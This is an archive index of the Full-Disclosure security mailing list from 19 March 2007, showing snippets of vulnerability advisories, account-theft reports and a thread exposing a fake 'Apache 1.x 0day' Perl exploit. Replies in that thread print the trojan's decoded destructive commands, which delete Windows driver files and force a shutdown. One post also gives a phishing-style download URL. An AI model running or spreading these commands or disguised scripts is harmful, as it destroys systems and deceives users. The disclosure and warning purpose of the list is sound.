[Full-disclosure] Layered Defense Research Advisory: F-Secure Anti-Virus Client Security 6.02 Format String Vulnerability

2007-03-19 Thread Deral Heiland
== Layered Defense Research Advisory 18 March 2007 == 1) Affected Software F-Secure Anti-Virus Client Security Version 6.02 == 2) Severity Rating: Low

[Full-disclosure] unsubscribe

2007-03-19 Thread Tucker Jeff
unsubscribe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, March 19, 2007 7:00 AM To: full-disclosure@lists.grok.org.uk Subject: Full-Disclosure Digest, Vol 25, Issue 27 Send Full-Disclosure mailing list submissions to

Re: [Full-disclosure] [WEB SECURITY] GMail Contact Information Disclosure PoC

2007-03-19 Thread Dror Shalev
Here is another one: http://spreadsheets.google.com/contacts/picker/data/contacts?groups=truesho w=ALLenums=truemax=999out=xml Let's play. Dror ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] Asterisk SDP DOS vulnerability

2007-03-19 Thread Radu State
MADYNES Security Advisory http://madynes.loria.fr/ Title: Asterisk SIP INVITE remote DOS Release Date: 08/03/2007 Severity: High - Denial of Service Advisory ID: KIPH1 Software: Asterisk http://www.asterisk.org/

[Full-disclosure] w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities

2007-03-19 Thread Jesper Jurcenoks
netVigilance Security Advisory #14 w-agora version 4.2.1 Multiple Path Disclosure Vulnerabilities Description: w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web. Multiple path

[Full-disclosure] w-agora version 4.2.1 Information Disclosure Vulnerability

2007-03-19 Thread Jesper Jurcenoks
netVigilance Security Advisory #15 w-agora version 4.2.1 Information Disclosure Vulnerability Description: w-agora is a set of scripts written in PHP. This package is intended to allow users to share, exchange and publish information, files and discussions over the web. It is possible to

[Full-disclosure] A new apache 1.x 0day

2007-03-19 Thread x666
Hi, A new apache 1.x 0day #!/usr/bin/perl use MIME::Base64; use IO::Socket; use HTTP::Response; use HTTP::Status; use Getopt::Std; print q { # ## ## Apache 1.X Remote Buffer Overflow getRoot() Exploit ## written by 666 - [EMAIL

[Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

2007-03-19 Thread starcadi
Description: dkftpbench is an FTP benchmark program inspired by SPECweb99. The result of the benchmark is a number-of-simultaneous-users rating; after running the benchmark properly, you have a good idea how many simultaneous dialup clients a server can support. The target bandwidth per client is

Re: [Full-disclosure] A new apache 1.x 0day

2007-03-19 Thread Thierry Zoller
$mov = decode_base64(QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=); @del %SystemRoot%\System32\drivers\*.* /F /S /Q nul $int = decode_base64(c2h1dGRvd24gLXMgLWYgLXQgMA==); shutdown -s -f -t 0 -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36

Re: [Full-disclosure] A new apache 1.x 0day

2007-03-19 Thread don bailey
@del %SystemRoot%\System32\drivers\*.* /F /S /Q nul shutdown -s -f -t 0 What, the attempt at visually obstructing the system() calls didn't give it away?

[Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability

2007-03-19 Thread starcadi
Description: CFTP is Comfortable FTP, a full screen ftp client. Supported are FTP both with active and passive data connections, IPv4 and IPv6, and SFTP (a file transfer protocol using SSH for authorization and connection encryption). Found local buffer overflow in readrc() with sprintf() with no

Re: [Full-disclosure] A new apache 1.x 0day

2007-03-19 Thread Knud Erik Højgaard
lol, system ($mov);system ($int);shift; $mov and $int are base64 encoded pieces of crap deleting %systemroot%\system32\drivers\*.* and shutting down the Windows box, funny and oh so obvious.

[Full-disclosure] [USN-437-1] libwpd vulnerability

2007-03-19 Thread Kees Cook
=== Ubuntu Security Notice USN-437-1 March 19, 2007 libwpd vulnerability CVE-2007-0002 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

[Full-disclosure] ZynOS v3.40 One packet killer

2007-03-19 Thread Joxean Koret
Hi to all, While playing in my home's network with Scapy I found a vulnerability affecting the wireless services offered by Zyxel routers with, at least, ZynOS v3.40. That's the unique model I tested. The exploit in question: -- ZynOS v3.40 One

Re: [Full-disclosure] Xbox live accounts are being stolen (update)

2007-03-19 Thread Kevin Finisterre (lists)
Since boatloads of people are asking me about this I figured I would just give an update here Here is an exhaustive list of people experiencing the problem as well as a possible source of the account theft (Clan Infamous) http://www.oinfamouso.moonfruit.com/ They claim to be pretexting

[Full-disclosure] heeee he

2007-03-19 Thread heeeee he
Dear Yahoo We use the following email to collect victims' credentials [1]. Please ban our asses! [EMAIL PROTECTED] [1] http://88.191.15.116/www.paypal.com/cgi-bin/www.amazon.com.zip thanks for reading heee he

[Full-disclosure] Microsoft coverup ? Stolen Xbox live accounts list of known victims - Please Help

2007-03-19 Thread Kevin Finisterre (lists)
Dates indicate thread start date not necessarily the offending post date. Clan Homepages of *some* of those that are responsible for the attacks on Xbox live accounts. 3-19-2007 (See the blacklist and member list) o InFamOuS o clan http://www.oinfamouso.moonfruit.com/ 3-19-2007 This Site
